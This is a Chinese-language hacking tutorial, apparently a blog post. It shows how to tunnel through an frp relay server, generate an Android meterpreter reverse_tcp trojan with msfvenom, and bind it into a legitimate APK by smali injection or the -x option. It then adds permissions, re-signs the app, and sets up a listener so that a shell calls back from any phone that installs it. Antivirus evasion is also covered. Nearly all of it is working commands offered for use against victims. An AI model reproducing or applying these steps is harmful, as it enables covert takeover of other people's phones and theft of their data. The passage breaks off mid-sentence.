1.frp是一款免费的内网穿透工具，当两个局域网的时候可以通过这个来进行渗透
2.首先准备一台具有公网的服务器
3.和ftp一样都是具有服务端和客户端的，服务端下载和客户端下载一定要保持版本号一直，再根据不同的内核下载不同的压缩包。

• 比如服务端(服务器)：

wget https://github.com/fatedier/frp/releases/frp_0.33.0_linux_amd64.tar.gz

比如客户端（kali）：

wget https://github.com/fatedier/frp/releases/frp_0.33.0_darwin_amd64.tar.gz

服务器(只要是入口的都要放行：3999 6000 2333,开启你需要的端口)

下载好frp后，在服务端点进去文件系统，点进去/usr，在/usr目录下的local文件夹中新建一个命名为frp的文件夹，把刚刚下载好的frp放到/usr/local/frp/，最后效果如下图所示：

然后进入解压后的文件，可手动删除frpc、frpc.ini(客户端文件)，然后进入frps.ini进行配置：

当然也可以用命令：

tar -zxvf frp_0.33.0_linux_amd64.tar.gz 
#进入frp解压目录
cd frp_0.33.0_linux_amd64.tar.gz
ls
#编辑frps.ini文件
vi frps.ini
#frp服务端与客户端连接端口，frps和frpc必须一致;防火墙放行该端口，
bind_port=39999(默认的是7000被我改了，科莫及～～～)
#启动frps
./frps

然后启动服务端如下图：

[common]
server_addr =  你服务器IP
server_port = 9090
#token = 12345678    # 授权
tls_enable = true
protocol = kcp

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 2333
remote_port = 4444

服务端启动frp并启动成功：

启动方法：

客户端：前台启动：./frpc -c ./frpc.ini 后台启动：nohup ./frpc -c ./frpc.ini &

服务器端：前台启动：./frps -c ./frps.ini 后台启动：nohup ./frps -c ./frps.ini &

这样两边就都启动成功了。（这里不讲配置的一些理论理解了，麻烦，大家可以百度内网穿透的理论知识）

目前内网穿透正式启动好了，第二步生成木马：

然后执行如下命令生成木马文件.

通过如下命令生成木马，注意这里的LHOST是公网的ip，LPORT是上面frpc.ini的remote_port。这是最重要的地方。

这里监听了4444端口

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.3.14
lport=4444 R>/root/abc.apk

#lhost=是服务器IP

这里的apk还无法直接在安卓中运行。

会提示如下:

所以我们要进行免杀等捆绑操作可以看一下操作：

3）将（2）中反编译出来的AndroidManifest.xml文件中的和粘贴到（1）中的AndroidManifest.xml中（改变该apk应用的权限）
（4）拷贝payload：将（2）中反编译的文件smali/com目录下的文件拷贝到（1）中对应目录下
（5）执行payload:在apk程序入口Activity的oncreate()方法，添加以下脚本：

invoke-static{p0},Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

可使用aapt查找apk包主程序入口，也可查看文件AndroidManifest.xml中的以下脚本的包名,其中com.chenai.eyen.act.MainDl即为主程序入口activity

小白向——注入有效载荷 and 过手机杀毒 – X黑手网-Kali Nethunter论坛-移动端-X黑手网 (x10001.com)

或者：

木马免杀

对于以上的木马，是无法通过杀毒软件的查杀的，我们可以将 payload加入到正常的APP中，来起来免杀的效果。
命令:

msfvenom -p -x test.apk android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > kali.apk

命令详解:
-x: 后跟原生态app
生成的kali.apk为新的木马文件。

视频演示:

但是呢，经过上述操作获取此时，payload已经成功注入我们的需要捆绑的软件中中，但是很多小伙伴会发现，安装后无法正常使用功能，这时候就需要为其添加权限，

接下来，使用Apktool反编译此文件。为了方便区分，我们将此apk名修改为2.apk，并移动到root目录下。

k) 下面使用Apktool反编译，打开终端，输入命令apktool d /root/2.apk，回车。

l) 此时我们的apk已经反编译完成，打开目录2下的AndroidManifest.xml，我们会发现此时这个apk所声明的权限很少，并不能实现我们所需要的功能，此时就需要声明更多权限。

m) 此时很多小伙伴就会有疑问：我对android代码一无所知，怎么知道我们的payload需要些什么权限呢？这可难不倒我们，我们可以用msf生成一个原始的payload，反编译这个apk，去查看它声明了哪些权限，复制进来就可以了，下面我们继续操作。

n) 在终端中输入命令msfvenom -p android/meterpreter/reverse_tcp LHOST=10.161.94.25 LPORT=4444 -o 3.apk，就可以在root目录下生成一个3.apk的payload，并且按照我们之前k中的步骤反编译。

o) 此时，反编译已经完成，我们来看看payload声明了哪些权限。

p) 好的，我们复制这些代码到我们2目录下的相同位置处并保存，但要注意不能重复声明。

q) 此时我们最关键的声明权限步骤已经完成，接下来要做的就是使用Apktool打包应用，并为其添加签名。终端中输入命令，apktool b /root/，回车，此时应用打包就完成了。新应用会存放在/root/2/dist/2.apk这个位置。为了方便区分，我们将其文件名修改为4.apk，并移动到root目录下。当然，此时的应用还是未签名的，下一步，我们对其进行签名操作。（当然也可以用MT管理器签名，方便快捷）

r) 首先需要生成签名证书KEYSTORE，终端中输入命令keytool -genkey -alias android.keystore -keyalg RSA -validity 20000 -keystore android.keystore，回车。

参数说明：

-genkey 生成文件
-alias 别名
-keyalg 加密算法
-validity 有效期
-keystore 文件名

最后一步输入Y确认输入并回车，即可。

s) 这样就生成好了签名证书，接下来我们对apk进行签名。终端中输入命令jarsigner -verbose -keystore android.keystore -signedjar 4_signed.apk 4.apk android.keystore，回车。

参数说明：

4_signed.apk是签名之后的文件
4.apk是需要签名的文件

t) 此时，应用签名已经完成，我们可以进行测试了。将签名后的4_signed.apk安装到手机上。

u) 下一步，打开msf控制台，设置好监听参数后，等待上线。打开终端，输入命令msfconsole，回车。进入msf控制台。

输入命令use exploit/multi/handler，回车。

输入set PAYLOAD android/meterpreter/reverse_tcp，回车。

输入set LHOST 127.0.0.1，回车。

输入set LPORT 4444，回车。

注意这里的lhost是localip即127.0.0.1、lport是localport即4444。这里是端口进行了转发。

接下来就可以把qyyx.apk木马文件发送给手机了
只要手机安装并且运行，shell就会反弹到kali中

怎么将kali生成的apk拿出来？有两个方法